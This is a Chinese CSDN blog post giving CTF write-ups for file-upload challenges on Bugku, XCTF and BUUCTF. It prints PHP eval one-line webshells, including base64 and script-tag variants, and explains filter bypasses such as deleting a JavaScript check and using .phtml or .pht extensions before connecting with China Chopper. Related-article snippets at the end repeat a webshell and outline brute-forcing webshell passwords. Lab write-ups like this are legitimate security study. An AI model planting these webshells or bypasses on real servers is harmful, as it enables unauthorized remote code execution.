WEB_文件上传

于 2023-11-27 22:46:06 发布
阅读量56 收藏
点赞数
分类专栏: web 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65204980/article/details/134656518
版权

一句话木马

Bugku

1.xxx二手交易市场

进入场景都是商品看的眼花缭乱一时间没找到什么思路

看到url上有id猜是sql 构造了几个payload尝试了没反应

就注册个账号进入看看 进入个人信息看看 发现有头像上传 猜突破口在这

抓包上传个带语句的图片

发现image后面明显是base64加密过的 我们试着把一句话木马<?php @eval($_POST['123456']);?>也加密加进去得到路径 红字是图片base64加密

image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk7Pz4=

用菜刀连接得到flag

2.文件上传

直接抓包上传木马文件得到路径

关键点

菜刀连接得到flag

功防世界

1.unseping(文件上传)

进入场景 看到一个上传头像的框

上传一个一句话木马 查看路径

用菜刀连接得到flag

2.upload1(文件上传)

进入场景发现一个文件上传的界面

直接上传木马文件试一试 上传键失效了

我们看源代码是js限制了PHP上传只允许jpg png 上传

知道了这个 我们两种方法可以绕过上传

  1. 可以通过抓包绕过
  2. 修改前端“上传“的hdml属性
  3. 禁止js脚步运行

我们用第二种方法方便 先删除οnchange="check();这个元素 上传 得到路径

菜刀连接得到flag

Buuctf

[极客挑战]

1.knife

看见页面提示可能是使用中国菜刀进行连接

2.upload

文件上传漏洞——图片木马

上传一个图片里面包含一句话木马

发现对一句话木马的<?进行了过滤

这里采用脚本风格的一句话木马

<script language="php">

    eval($_POST['cmd']);

</script>

但是!!!!!要把上传文件的后缀名改成php才能连接进去

题目对尾缀PHP进行了过滤

php3,pht,phtml,phps等后缀如果服务器是apach的话配置文件是可以添加这些php别名进行解析的

这里使用phtml进行绕过

上传成功

现在进行远程连接

找到flag值

3.Upload

文件上传——图片木马

对后缀名进行过滤用BP抓包修改后缀

但是直接用PHP后缀会被过滤这里使用pht后缀上传

用中国菜刀远程连接即可

小犹太879
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu~二手交易市场:文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1344
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php再上传。上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
服务器上传文件权限怎么解决,使用 base64 命令绕开服务器无权限上传文件问题...
weixin_33318722的博客
08-06 444
Windows 平台生成 base64 字符串生成的base64字符串保存到back.txt文件。certutil -encode test.png back.txtbase64 恢复成文件certutil -decode back.txt test-recover.png校验文件 md5 是否一致原始文件md5值:certutil -hashfile test.png md5输出C:\Users...
使用base64进行绕过系统限制拷贝上传
邱天的博客
05-12 431
这里写自定义目录标题背景base64 背景 客户的生成环境管理很严格,只有一个普通用户权限,并且关闭了scp sftp等上传的命令。且只能通过堡垒操作 现在需要上传一些文件到客户的生成环境。 base64 使用base64命令 把图片转换为base64 [test@docker ~]base64/usr/share/backgrounds/default.jpg>2.base[test@docker ]base64 /usr/share/backgrounds/default.jpg
文件上传漏洞
m0_59134926的博客
11-09 277
文件上传
一句话马密码暴力破解篇(黑吃黑)
weixin_48421613的博客
08-21 2575
一句话暴力破解 1.1 我们得知一句话木马地址为:http://10.10.87.211/test.php,当我们不知道密码的时候该如何破解其密码? 1.2 @eval($_POST[“123456”]) 我们得知一句话木马eval 可以将里面的内容执行,我们可以利用这个机制(先用我们已知的小马进行实验) 我们首先创建一个form表单,表单提交地址为小马地址 我们打开浏览器,在里面提交内容,而后进行抓包,在Repeater中打开 我们发现,在最下方出现了我们上传的内容以及文本框的nam
uploadfile_大文件上传_springboot_webupload_源码
10-02
本项目"uploadfile_大文件上传_springboot_webupload_源码"旨在演示如何结合WebUpload和Spring Boot实现高效的大文件上传功能。 首先,我们要理解Spring Boot中的MultipartFile接口。这是Spring MVC框架为处理上传...
用C井实现Web文件的上传.rar_C# web 上传_C# 上传_web 文件上传
09-14
在C#中实现Web文件上传是一项常见的任务,尤其在开发基于.NET Framework的Web应用程序时。这一过程涉及到HTTP协议的理解、表单提交以及处理文件流。本文将深入探讨如何使用C#来实现这一功能。 首先,我们需要理解...
WEB_文件的上传与下载思维导图总结及所用的包
10-17
总结,Web文件上传与下载涉及前端交互、后端处理、文件存储、安全控制等多个层面,合理的利用各种工具和库,可以构建高效且安全的文件管理系统。对于开发者来说,理解和掌握这些知识点是必要的。
Webapi 文件上传
10-31
文件上传WebAPI中常见的一种功能,用于接收客户端上传的数据,通常包括图片、文档、音频或视频等文件。在本篇文章中,我们将深入探讨如何在WebAPI中实现文件上传,以及涉及的关键知识点。 首先,我们需要创建一个...
mfc-web.rar_WEB浏览器_文件监控
09-21
例如,限制上传的文件类型、大小,防止敏感数据泄露或恶意文件上传。 - 还可以提供上传进度显示,方便用户了解文件传输状态。 4. **邮件管理**: - 在Web浏览器中,邮件管理可能指的是集成电子邮件客户端功能,...
web漏洞】文件上传
weixin_51614272的博客
02-16 1447
user.ini配置文件可控导致的文件上传漏洞 当前目录里面有php文件的时候,可以运用ini配置文件进行配置这个php文件 文件包含配置项有auto_append_file和auto_pretend_file auto_append_file=1.txt //保存为user.ini,记得抓包时文件名是.user.ini 1.先上传这个user.ini文件,发现上传成功。 2.然后本来不能上传规定外的文件,现在就可以上传了 3.这个1.txt里面就是一句话木马 <?php @ev
蚁剑操作手册
最新发布
weixin_44820552的博客
03-27 2894
蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,将一句话木马上传到被测平台,通过蚁剑进行连接获取被测平台的服务器webshell。
中职网络安全D—文件上传
Jay
04-21 1118
window 怎么利用上传漏洞进行攻击 一句话木马保存成*.php <?php @eval($_POST[123456]);?> 然后上传,获取地址 确认是否上传成功,将他拼接到url上 获取到木马地址 使用菜刀连接 双击获取文件管理器 或者 右击 选择虚拟终端,获取shell 使用kali的工具进行文件上传以及连接 首先生成木马,密码为123456 文件路径为/muma.php 再次拼接url获取到.
WEB安全基础 - - -命令执行漏洞
weixin_67503304的博客
07-28 1507
简要介绍命令执行漏洞的原理,总结了常用的PHP代码执行函数。
上传文件不落地转Base64字符串
软件老王
06-28 2936
文章目录1. 问题描述2. 解决方案2.1 controller接收前端上传文件2.2 service读取文件流并转换Base64字符 1. 问题描述 因需调用第三方公司的图像识别接口,入参是:证件类型、图像类型、图片base64字符串,采用http+json格式调用。 本来采用的方式是:前端对图片做base64处理,后端组装下直接调用第三方接口,然后将结果返回给前端展示。然而联调过程中,...
Base64图片上传问题解决
Jerry
08-29 4672
      最近开发API上传文件,采用了Base64格式上传,后端接受前端Base64图片内容,此后decode 后上传至阿里云。 在从阿里云取出流,并想继续在java中谷歌thumbnails工具生成缩略图时,出现了问题。总是报:net.coobird.thumbnailator.tasks.UnsupportedFormatException: No suitable ImageReade...
真正的解决了服务器防止图片木马
fengyulou的博客
08-30 3169
这问题困扰了我一段时间,图片压缩,不用二进制,用base64分段传输,头尾放一下没有的字符,到了服务器在给取消掉。服务器端放图片文件禁止没有运行的权限。完美解决图片木马。 如果按常规上传图片,木马写在图片里面各种安全软件确实很难发现的。 ...
文件上传绕过技巧
m_ing
10-21 1756
这篇文章是由我们团队的aaaahuia大佬整理。我来白嫖一下 我这里就分为两种吧,一种是基于代码限制的,一种基于防火墙,其实总的来看两者差不多,都是检测文件合法性,但是两者区别开来,在实际应用中信息收集之后对于一个网站的防护措施有了了解后,能够更精准的选择上传绕过方式。 (本篇都使用php一句话木马作为示例) 前端JS限制文件后缀 限制只能上传规定后缀文件,绕过方式: 1.禁用检测文件后缀的JS代码 2.上传正常格式文件,抓包修改文件的filename为脚本格式 Content-type限制 后台校验上传文
Java Web文件上传下载实现及原理
"Java Web文件上传和下载是Web开发中的常见需求,主要涉及表单数据编码、文件上传组件以及文件下载支持。Apache的Common-FileUpload组件和Struts2框架都提供了便捷的文件上传和下载解决方案。" 在Java Web开发中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值